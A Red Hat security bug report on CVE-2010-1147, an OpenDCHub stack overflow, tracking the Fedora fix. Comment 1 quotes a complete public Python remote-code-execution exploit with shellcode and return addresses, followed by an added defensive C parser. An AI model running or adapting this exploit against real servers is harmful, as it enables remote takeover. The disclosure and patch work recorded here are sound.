Bug 579206 - (CVE-2010-1147) CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Platform: All Linux
Priority: medium
Severity: medium
Assigned To: Red Hat Product Security
URL: http://www.indahax.com/exploits/opend...
Whiteboard: impact=moderate,source=debian,reporte...
Keywords: Security
Depends On: 579207
Reported: 2010-04-03 05:11 EDT by Jan Lieskovsky
Modified: 2010-04-30 13:18 EDT
Doc Type: Bug Fix
Attachments: None

Description Jan Lieskovsky 2010-04-03 05:11:37 EDT
Pierre Nogues found a stack overflow flaw in the way Open DC Hub
sanitized the content of a user's MyINFO message. A remote attacker
with a valid Open DC Hub account could send a specially-crafted
MyINFO message to another user or to all users connected to a particular
Direct Connect network, leading to a denial of service (opendchub
crash) or, potentially, to arbitrary code execution with the privileges
of the user running opendchub.

References:
  [1] http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
  [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308

CVE Request:
  [3] http://www.openwall.com/lists/oss-security/2010/04/03/1
Comment 1 Jan Lieskovsky 2010-04-03 05:13:08 EDT
Public PoCs by Pierre posted in [1]:

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Plateforms :
#     Unix
#
# Usage :
#     ./exploit.py
 
import socket
 
host = '192.168.1.9'
port = 5000
 
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24" 
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d" 
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75" 
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2" 
shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc" 
shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29" 
shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b" 
shellcode+="\x2b"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
 
hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
hax+="S:-1|"
 
s.send(hax)
s.close()
 
"""
# V2
# more complex version working too, it have more space for the shellcode
 
hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
hax+=shellcode
hax+="|"
"""
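The flaw this report describes is a MyINFO message whose length handling lets a stack buffer be overrun; the second PoC above notes that an int length variable in commands.c:my_info() has to be driven negative. That is the classic failure of trusting a signed or unchecked length when copying a protocol field into a fixed stack buffer. The program below is an added, defensive illustration written for this page and is not opendchub's own code: it parses the "$MyINFO $ALL <nick> <description>$..." line shape with every length computed as size_t against explicit limits, rejecting rather than truncating anything that does not fit. The field limits (MAX_NICK, MAX_DESC), the helper names (copy_field, parse_myinfo, the demo_* functions) and the sample messages are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed field limits for this example; not opendchub's values. */
#define MAX_NICK 64
#define MAX_DESC 256

struct myinfo {
    char nick[MAX_NICK + 1];
    char desc[MAX_DESC + 1];
};

/* Copy [start, end) into dst only if its length lies within [min_len, limit].
 * Lengths are size_t, so there is no "negative length" path, and an
 * oversized field is rejected (-1) rather than silently truncated. */
static int copy_field(char *dst, size_t limit, size_t min_len,
                      const char *start, const char *end)
{
    if (end < start) return -1;
    size_t len = (size_t)(end - start);
    if (len < min_len || len > limit) return -1;
    memcpy(dst, start, len);
    dst[len] = '\0';
    return 0;
}

/* Assumed shape: "$MyINFO $ALL NICK DESCRIPTION$...|"
 * Returns 0 and fills *out on a well-formed message, -1 otherwise. */
int parse_myinfo(const char *msg, size_t msg_len, struct myinfo *out)
{
    static const char prefix[] = "$MyINFO $ALL ";
    const size_t plen = sizeof(prefix) - 1;
    const char *end = msg + msg_len;
    if (msg_len < plen || memcmp(msg, prefix, plen) != 0) return -1;

    const char *nick_start = msg + plen;
    const char *nick_end = memchr(nick_start, ' ', (size_t)(end - nick_start));
    if (nick_end == NULL) return -1;

    const char *desc_start = nick_end + 1;
    const char *desc_end = memchr(desc_start, '$', (size_t)(end - desc_start));
    if (desc_end == NULL) return -1;

    /* Text fields of this protocol never carry control bytes; reject them early. */
    for (const char *p = nick_start; p < desc_end; p++)
        if ((unsigned char)*p < 0x20) return -1;

    if (copy_field(out->nick, MAX_NICK, 1, nick_start, nick_end) != 0) return -1;
    if (copy_field(out->desc, MAX_DESC, 0, desc_start, desc_end) != 0) return -1;
    return 0;
}

/* Constructed sample inputs (not captures from the report). Each returns the
 * parser's verdict so the behaviour can be checked without reading output. */
int demo_valid_message(void)
{
    struct myinfo mi;
    const char msg[] = "$MyINFO $ALL joseph A Linux user$ $LAN(T3)$$0$|";
    if (parse_myinfo(msg, sizeof msg - 1, &mi) != 0) return -1;
    return (strcmp(mi.nick, "joseph") == 0 &&
            strcmp(mi.desc, "A Linux user") == 0) ? 0 : -1;
}

int demo_overlong_nick(void)
{
    struct myinfo mi;
    char msg[200];
    size_t n = 0;
    memcpy(msg + n, "$MyINFO $ALL ", 13); n += 13;
    memset(msg + n, 'A', 120);            n += 120;   /* 120 > MAX_NICK */
    memcpy(msg + n, " desc$|", 7);        n += 7;
    return parse_myinfo(msg, n, &mi);     /* rejected: -1 */
}

int demo_missing_terminator(void)
{
    struct myinfo mi;
    const char msg[] = "$MyINFO $ALL joseph no dollar sign here|";
    return parse_myinfo(msg, sizeof msg - 1, &mi);   /* rejected: -1 */
}

int demo_control_byte(void)
{
    struct myinfo mi;
    const char msg[] = "$MyINFO $ALL joseph bad\x01" "desc$|";
    return parse_myinfo(msg, sizeof msg - 1, &mi);   /* rejected: -1 */
}

int main(void)
{
    printf("valid=%d overlong=%d missing=%d control=%d\n",
           demo_valid_message(), demo_overlong_nick(),
           demo_missing_terminator(), demo_control_byte());
    return 0;
}
```

The design point is that the parser never derives a copy length from anything the peer controls without first bounding it as an unsigned quantity against the destination buffer, and that it fails closed: a message that does not fit the expected shape is dropped instead of being partially processed.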
Comment 2 Jan Lieskovsky 2010-04-03 05:14:30 EDT
This issue affects the versions of the opendchub package
as shipped with Fedora releases 11 and 12.

Please fix.
Comment 4 Jan Lieskovsky 2010-04-06 03:40:05 EDT
This is CVE-2010-1147.
Comment 5 Roshan Singh 2010-04-08 13:56:51 EDT
I have fixed the bug and created the RPM, but I forgot to put the CVE ids in the RPM changelog. Do I need to recreate the RPM?
Comment 6 Jan Lieskovsky 2010-04-08 14:13:58 EDT
Hi Roshan,

  I can see "- New release with fix for buffer overflow" in
the Changelog, which should be sufficient. (Some further
guidance is also available here:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, when submitting the request to Bodhi, be sure to
mention the "CVE-2010-1147" identifier in the "Update Information"
field, together with #579206 (this bug) in the "Bugs Fixed"
field.

Thanks && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Comment 7 Fedora Update System 2010-04-08 14:29:28 EDT
opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc11
Comment 8 Fedora Update System 2010-04-08 14:30:31 EDT
opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc12
Comment 9 Fedora Update System 2010-04-08 14:31:49 EDT
opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc13
Comment 10 Roshan Singh 2010-04-09 00:26:58 EDT
I have deleted these updates. I had uploaded the wrong tarball to SourceForge; luckily nobody had downloaded it by then. I will update the RPM by today.

I am sorry for the inconvenience.
Comment 11 Fedora Update System 2010-04-10 13:25:09 EDT
opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc12
Comment 12 Fedora Update System 2010-04-10 13:25:13 EDT
opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc11
Comment 13 Fedora Update System 2010-04-10 13:25:17 EDT
opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.
http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc13
Comment 14 Fedora Update System 2010-04-30 13:10:57 EDT
opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 15 Fedora Update System 2010-04-30 13:18:50 EDT
opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.